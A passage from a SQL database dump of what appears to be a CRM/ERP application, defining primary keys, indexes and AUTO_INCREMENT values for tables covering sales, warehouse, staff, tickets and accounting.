ALTER TABLE `tblrequest_type`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_type_form`
--
ALTER TABLE `tblrequest_type_form`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_type_workflow`
--
ALTER TABLE `tblrequest_type_workflow`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblroles`
--
ALTER TABLE `tblroles`
  ADD PRIMARY KEY (`roleid`);

--
-- Indexes for table `tblsalary_form`
--
ALTER TABLE `tblsalary_form`
  ADD PRIMARY KEY (`form_id`);

--
-- Indexes for table `tblsales_activity`
--
ALTER TABLE `tblsales_activity`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsales_channel`
--
ALTER TABLE `tblsales_channel`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsales_channel_detailt`
--
ALTER TABLE `tblsales_channel_detailt`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_approval_details`
--
ALTER TABLE `tblsa_approval_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_approval_setting`
--
ALTER TABLE `tblsa_approval_setting`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_clients`
--
ALTER TABLE `tblsa_clients`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_client_groups`
--
ALTER TABLE `tblsa_client_groups`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_goods_delivery`
--
ALTER TABLE `tblsa_goods_delivery`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_goods_delivery_detail`
--
ALTER TABLE `tblsa_goods_delivery_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_goods_delivery_invoices_pr_orders`
--
ALTER TABLE `tblsa_goods_delivery_invoices_pr_orders`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_goods_receipt`
--
ALTER TABLE `tblsa_goods_receipt`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_goods_receipt_detail`
--
ALTER TABLE `tblsa_goods_receipt_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_goods_transaction_detail`
--
ALTER TABLE `tblsa_goods_transaction_detail`
  ADD PRIMARY KEY (`id`,`commodity_id`);

--
-- Indexes for table `tblsa_inventory_manage`
--
ALTER TABLE `tblsa_inventory_manage`
  ADD PRIMARY KEY (`id`,`commodity_id`,`warehouse_id`);

--
-- Indexes for table `tblsa_join_program_request`
--
ALTER TABLE `tblsa_join_program_request`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_options`
--
ALTER TABLE `tblsa_options`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_programs`
--
ALTER TABLE `tblsa_programs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_program_detail`
--
ALTER TABLE `tblsa_program_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_pur_orders`
--
ALTER TABLE `tblsa_pur_orders`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_pur_order_detail`
--
ALTER TABLE `tblsa_pur_order_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_sale_invoices`
--
ALTER TABLE `tblsa_sale_invoices`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_sale_invoice_details`
--
ALTER TABLE `tblsa_sale_invoice_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_sale_invoice_payment`
--
ALTER TABLE `tblsa_sale_invoice_payment`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsa_warehouse`
--
ALTER TABLE `tblsa_warehouse`
  ADD PRIMARY KEY (`warehouse_id`);

--
-- Indexes for table `tblscheduled_emails`
--
ALTER TABLE `tblscheduled_emails`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblservices`
--
ALTER TABLE `tblservices`
  ADD PRIMARY KEY (`serviceid`);

--
-- Indexes for table `tblsessions`
--
ALTER TABLE `tblsessions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `ci_sessions_timestamp` (`timestamp`);

--
-- Indexes for table `tblspam_filters`
--
ALTER TABLE `tblspam_filters`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblspreadsheet_online_hash_share`
--
ALTER TABLE `tblspreadsheet_online_hash_share`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblspreadsheet_online_my_folder`
--
ALTER TABLE `tblspreadsheet_online_my_folder`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblspreadsheet_online_related`
--
ALTER TABLE `tblspreadsheet_online_related`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblstaff`
--
ALTER TABLE `tblstaff`
  ADD PRIMARY KEY (`staffid`),
  ADD KEY `firstname` (`firstname`),
  ADD KEY `lastname` (`lastname`);

--
-- Indexes for table `tblstaff_contract`
--
ALTER TABLE `tblstaff_contract`
  ADD PRIMARY KEY (`id_contract`);

--
-- Indexes for table `tblstaff_contracttype`
--
ALTER TABLE `tblstaff_contracttype`
  ADD PRIMARY KEY (`id_contracttype`);

--
-- Indexes for table `tblstaff_contract_detail`
--
ALTER TABLE `tblstaff_contract_detail`
  ADD PRIMARY KEY (`contract_detail_id`);

--
-- Indexes for table `tblstaff_departments`
--
ALTER TABLE `tblstaff_departments`
  ADD PRIMARY KEY (`staffdepartmentid`);

--
-- Indexes for table `tblstaff_insurance`
--
ALTER TABLE `tblstaff_insurance`
  ADD PRIMARY KEY (`insurance_id`);

--
-- Indexes for table `tblstaff_insurance_history`
--
ALTER TABLE `tblstaff_insurance_history`
  ADD PRIMARY KEY (`id`,`insurance_id`);

--
-- Indexes for table `tblstock_take`
--
ALTER TABLE `tblstock_take`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblstock_take_detail`
--
ALTER TABLE `tblstock_take_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsubscriptions`
--
ALTER TABLE `tblsubscriptions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `clientid` (`clientid`),
  ADD KEY `currency` (`currency`),
  ADD KEY `tax_id` (`tax_id`);

--
-- Indexes for table `tblsurveyresultsets`
--
ALTER TABLE `tblsurveyresultsets`
  ADD PRIMARY KEY (`resultsetid`);

--
-- Indexes for table `tblsurveys`
--
ALTER TABLE `tblsurveys`
  ADD PRIMARY KEY (`surveyid`);

--
-- Indexes for table `tblsurveysemailsendcron`
--
ALTER TABLE `tblsurveysemailsendcron`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblsurveysendlog`
--
ALTER TABLE `tblsurveysendlog`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltaggables`
--
ALTER TABLE `tbltaggables`
  ADD KEY `rel_id` (`rel_id`),
  ADD KEY `rel_type` (`rel_type`),
  ADD KEY `tag_id` (`tag_id`);

--
-- Indexes for table `tbltags`
--
ALTER TABLE `tbltags`
  ADD PRIMARY KEY (`id`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `tbltasks`
--
ALTER TABLE `tbltasks`
  ADD PRIMARY KEY (`id`),
  ADD KEY `rel_id` (`rel_id`),
  ADD KEY `rel_type` (`rel_type`),
  ADD KEY `milestone` (`milestone`),
  ADD KEY `kanban_order` (`kanban_order`),
  ADD KEY `status` (`status`);

--
-- Indexes for table `tbltaskstimers`
--
ALTER TABLE `tbltaskstimers`
  ADD PRIMARY KEY (`id`),
  ADD KEY `task_id` (`task_id`),
  ADD KEY `staff_id` (`staff_id`);

--
-- Indexes for table `tbltasks_checklist_templates`
--
ALTER TABLE `tbltasks_checklist_templates`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltask_assigned`
--
ALTER TABLE `tbltask_assigned`
  ADD PRIMARY KEY (`id`),
  ADD KEY `taskid` (`taskid`),
  ADD KEY `staffid` (`staffid`);

--
-- Indexes for table `tbltask_checklist_items`
--
ALTER TABLE `tbltask_checklist_items`
  ADD PRIMARY KEY (`id`),
  ADD KEY `taskid` (`taskid`);

--
-- Indexes for table `tbltask_comments`
--
ALTER TABLE `tbltask_comments`
  ADD PRIMARY KEY (`id`),
  ADD KEY `file_id` (`file_id`),
  ADD KEY `taskid` (`taskid`);

--
-- Indexes for table `tbltask_followers`
--
ALTER TABLE `tbltask_followers`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltaxes`
--
ALTER TABLE `tbltaxes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltemplates`
--
ALTER TABLE `tbltemplates`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltickets`
--
ALTER TABLE `tbltickets`
  ADD PRIMARY KEY (`ticketid`),
  ADD KEY `service` (`service`),
  ADD KEY `department` (`department`),
  ADD KEY `status` (`status`),
  ADD KEY `userid` (`userid`),
  ADD KEY `priority` (`priority`),
  ADD KEY `project_id` (`project_id`),
  ADD KEY `contactid` (`contactid`);

--
-- Indexes for table `tbltickets_pipe_log`
--
ALTER TABLE `tbltickets_pipe_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltickets_predefined_replies`
--
ALTER TABLE `tbltickets_predefined_replies`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltickets_priorities`
--
ALTER TABLE `tbltickets_priorities`
  ADD PRIMARY KEY (`priorityid`);

--
-- Indexes for table `tbltickets_status`
--
ALTER TABLE `tbltickets_status`
  ADD PRIMARY KEY (`ticketstatusid`);

--
-- Indexes for table `tblticket_attachments`
--
ALTER TABLE `tblticket_attachments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblticket_replies`
--
ALTER TABLE `tblticket_replies`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltodos`
--
ALTER TABLE `tbltodos`
  ADD PRIMARY KEY (`todoid`);

--
-- Indexes for table `tbltracked_mails`
--
ALTER TABLE `tbltracked_mails`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbltwocheckout_log`
--
ALTER TABLE `tbltwocheckout_log`
  ADD PRIMARY KEY (`id`),
  ADD KEY `invoice_id` (`invoice_id`);

--
-- Indexes for table `tbluser_api`
--
ALTER TABLE `tbluser_api`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbluser_meta`
--
ALTER TABLE `tbluser_meta`
  ADD PRIMARY KEY (`umeta_id`);

--
-- Indexes for table `tblvault`
--
ALTER TABLE `tblvault`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblviews_tracking`
--
ALTER TABLE `tblviews_tracking`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwarehouse`
--
ALTER TABLE `tblwarehouse`
  ADD PRIMARY KEY (`warehouse_id`);

--
-- Indexes for table `tblware_body_type`
--
ALTER TABLE `tblware_body_type`
  ADD PRIMARY KEY (`body_type_id`);

--
-- Indexes for table `tblware_color`
--
ALTER TABLE `tblware_color`
  ADD PRIMARY KEY (`color_id`);

--
-- Indexes for table `tblware_commodity_type`
--
ALTER TABLE `tblware_commodity_type`
  ADD PRIMARY KEY (`commodity_type_id`);

--
-- Indexes for table `tblware_size_type`
--
ALTER TABLE `tblware_size_type`
  ADD PRIMARY KEY (`size_type_id`);

--
-- Indexes for table `tblware_style_type`
--
ALTER TABLE `tblware_style_type`
  ADD PRIMARY KEY (`style_type_id`);

--
-- Indexes for table `tblware_unit_type`
--
ALTER TABLE `tblware_unit_type`
  ADD PRIMARY KEY (`unit_type_id`);

--
-- Indexes for table `tblweb_to_lead`
--
ALTER TABLE `tblweb_to_lead`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_activity_log`
--
ALTER TABLE `tblwh_activity_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_approval_details`
--
ALTER TABLE `tblwh_approval_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_approval_setting`
--
ALTER TABLE `tblwh_approval_setting`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_brand`
--
ALTER TABLE `tblwh_brand`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_custom_fields`
--
ALTER TABLE `tblwh_custom_fields`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_goods_delivery_activity_log`
--
ALTER TABLE `tblwh_goods_delivery_activity_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_inventory_serial_numbers`
--
ALTER TABLE `tblwh_inventory_serial_numbers`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_loss_adjustment`
--
ALTER TABLE `tblwh_loss_adjustment`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_loss_adjustment_detail`
--
ALTER TABLE `tblwh_loss_adjustment_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_model`
--
ALTER TABLE `tblwh_model`
  ADD PRIMARY KEY (`id`,`brand_id`);

--
-- Indexes for table `tblwh_omni_shipments`
--
ALTER TABLE `tblwh_omni_shipments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_order_returns`
--
ALTER TABLE `tblwh_order_returns`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_order_returns_refunds`
--
ALTER TABLE `tblwh_order_returns_refunds`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_order_return_details`
--
ALTER TABLE `tblwh_order_return_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_packing_lists`
--
ALTER TABLE `tblwh_packing_lists`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_packing_list_details`
--
ALTER TABLE `tblwh_packing_list_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwh_series`
--
ALTER TABLE `tblwh_series`
  ADD PRIMARY KEY (`id`,`model_id`);

--
-- Indexes for table `tblwh_sub_group`
--
ALTER TABLE `tblwh_sub_group`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwoocommere_store`
--
ALTER TABLE `tblwoocommere_store`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblwoocommere_store_detailt`
--
ALTER TABLE `tblwoocommere_store_detailt`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblworkplace`
--
ALTER TABLE `tblworkplace`
  ADD PRIMARY KEY (`workplace_id`);

--
-- Indexes for table `tblwork_shift`
--
ALTER TABLE `tblwork_shift`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `tblacc_accounts`
--
ALTER TABLE `tblacc_accounts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=88;

--
-- AUTO_INCREMENT for table `tblacc_account_history`
--
ALTER TABLE `tblacc_account_history`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1949;

--
-- AUTO_INCREMENT for table `tblacc_account_type_details`
--
ALTER TABLE `tblacc_account_type_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=202;

--
-- AUTO_INCREMENT for table `tblacc_banking_rules`
--
ALTER TABLE `tblacc_banking_rules`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_banking_rule_details`
--
ALTER TABLE `tblacc_banking_rule_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_budgets`
--
ALTER TABLE `tblacc_budgets`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_budget_details`
--
ALTER TABLE `tblacc_budget_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_expense_category_mappings`
--
ALTER TABLE `tblacc_expense_category_mappings`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_item_automatics`
--
ALTER TABLE `tblacc_item_automatics`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_journal_entries`
--
ALTER TABLE `tblacc_journal_entries`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_matched_transactions`
--
ALTER TABLE `tblacc_matched_transactions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_payment_mode_mappings`
--
ALTER TABLE `tblacc_payment_mode_mappings`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_plaid_transaction_logs`
--
ALTER TABLE `tblacc_plaid_transaction_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_reconciles`
--
ALTER TABLE `tblacc_reconciles`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_tax_mappings`
--
ALTER TABLE `tblacc_tax_mappings`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_transaction_bankings`
--
ALTER TABLE `tblacc_transaction_bankings`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblacc_transfers`
--
ALTER TABLE `tblacc_transfers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblactivity_log`
--
ALTER TABLE `tblactivity_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=12866;

--
-- AUTO_INCREMENT for table `tblallowance_type`
--
ALTER TABLE `tblallowance_type`
  MODIFY `type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblannouncements`
--
ALTER TABLE `tblannouncements`
  MODIFY `announcementid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblapplicable_staff`
--
ALTER TABLE `tblapplicable_staff`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblappointly_appointments`
--
ALTER TABLE `tblappointly_appointments`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblappointly_appointment_types`
--
ALTER TABLE `tblappointly_appointment_types`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblappointly_callbacks`
--
ALTER TABLE `tblappointly_callbacks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblappointly_callbacks_assignees`
--
ALTER TABLE `tblappointly_callbacks_assignees`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblappointly_google`
--
ALTER TABLE `tblappointly_google`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcart`
--
ALTER TABLE `tblcart`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcart_detailt`
--
ALTER TABLE `tblcart_detailt`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblclients`
--
ALTER TABLE `tblclients`
  MODIFY `userid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1450;

--
-- AUTO_INCREMENT for table `tblcommission`
--
ALTER TABLE `tblcommission`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcommission_hierarchy`
--
ALTER TABLE `tblcommission_hierarchy`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcommission_policy`
--
ALTER TABLE `tblcommission_policy`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcommission_receipt`
--
ALTER TABLE `tblcommission_receipt`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcommission_receipt_detail`
--
ALTER TABLE `tblcommission_receipt_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcommission_salesadmin_group`
--
ALTER TABLE `tblcommission_salesadmin_group`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblconsents`
--
ALTER TABLE `tblconsents`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblconsent_purposes`
--
ALTER TABLE `tblconsent_purposes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblcontacts`
--
ALTER TABLE `tblcontacts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1232;

--
-- AUTO_INCREMENT for table `tblcontact_permissions`
--
ALTER TABLE `tblcontact_permissions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7387;

--
-- AUTO_INCREMENT for table `tblcontracts`
--
ALTER TABLE `tblcontracts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=59;

--
-- AUTO_INCREMENT for table `tblcontracts_types`
--
ALTER TABLE `tblcontracts_types`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblcontract_comments`
--
ALTER TABLE `tblcontract_comments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblcontract_renewals`
--
ALTER TABLE `tblcontract_renewals`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `tblcountries`
--
ALTER TABLE `tblcountries`
  MODIFY `country_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=251;

--
-- AUTO_INCREMENT for table `tblcreditnotes`
--
ALTER TABLE `tblcreditnotes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11;

--
-- AUTO_INCREMENT for table `tblcreditnote_refunds`
--
ALTER TABLE `tblcreditnote_refunds`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblcredits`
--
ALTER TABLE `tblcredits`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblcurrencies`
--
ALTER TABLE `tblcurrencies`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblcurrency_rates`
--
ALTER TABLE `tblcurrency_rates`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `tblcurrency_rate_logs`
--
ALTER TABLE `tblcurrency_rate_logs`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=9751;

--
-- AUTO_INCREMENT for table `tblcustomers_groups`
--
ALTER TABLE `tblcustomers_groups`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblcustomer_groups`
--
ALTER TABLE `tblcustomer_groups`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=267;

--
-- AUTO_INCREMENT for table `tblcustomfields`
--
ALTER TABLE `tblcustomfields`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `tblcustomfieldsvalues`
--
ALTER TABLE `tblcustomfieldsvalues`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=89;

--
-- AUTO_INCREMENT for table `tblday_off`
--
ALTER TABLE `tblday_off`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tbldepartments`
--
ALTER TABLE `tbldepartments`
  MODIFY `departmentid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tbldismissed_announcements`
--
ALTER TABLE `tbldismissed_announcements`
  MODIFY `dismissedannouncementid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `tblemaillists`
--
ALTER TABLE `tblemaillists`
  MODIFY `listid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblemailtemplates`
--
ALTER TABLE `tblemailtemplates`
  MODIFY `emailtemplateid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2965;

--
-- AUTO_INCREMENT for table `tblestimates`
--
ALTER TABLE `tblestimates`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=257;

--
-- AUTO_INCREMENT for table `tblestimate_requests`
--
ALTER TABLE `tblestimate_requests`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=70;

--
-- AUTO_INCREMENT for table `tblestimate_request_forms`
--
ALTER TABLE `tblestimate_request_forms`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblestimate_request_status`
--
ALTER TABLE `tblestimate_request_status`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblevents`
--
ALTER TABLE `tblevents`
  MODIFY `eventid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblexpenses`
--
ALTER TABLE `tblexpenses`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblexpenses_categories`
--
ALTER TABLE `tblexpenses_categories`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblfiles`
--
ALTER TABLE `tblfiles`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=364;

--
-- AUTO_INCREMENT for table `tblfilters`
--
ALTER TABLE `tblfilters`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblform_questions`
--
ALTER TABLE `tblform_questions`
  MODIFY `questionid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblform_question_box`
--
ALTER TABLE `tblform_question_box`
  MODIFY `boxid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblform_question_box_description`
--
ALTER TABLE `tblform_question_box_description`
  MODIFY `questionboxdescriptionid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblform_results`
--
ALTER TABLE `tblform_results`
  MODIFY `resultid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblgdpr_requests`
--
ALTER TABLE `tblgdpr_requests`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblgoals`
--
ALTER TABLE `tblgoals`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblgoods_delivery`
--
ALTER TABLE `tblgoods_delivery`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblgoods_delivery_detail`
--
ALTER TABLE `tblgoods_delivery_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT for table `tblgoods_delivery_invoices_pr_orders`
--
ALTER TABLE `tblgoods_delivery_invoices_pr_orders`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblgoods_receipt`
--
ALTER TABLE `tblgoods_receipt`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblgoods_receipt_detail`
--
ALTER TABLE `tblgoods_receipt_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblgoods_transaction_detail`
--
ALTER TABLE `tblgoods_transaction_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=24;

--
-- AUTO_INCREMENT for table `tblhrm_option`
--
ALTER TABLE `tblhrm_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=29;

--
-- AUTO_INCREMENT for table `tblhrm_timesheet`
--
ALTER TABLE `tblhrm_timesheet`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblinsurance_type`
--
ALTER TABLE `tblinsurance_type`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

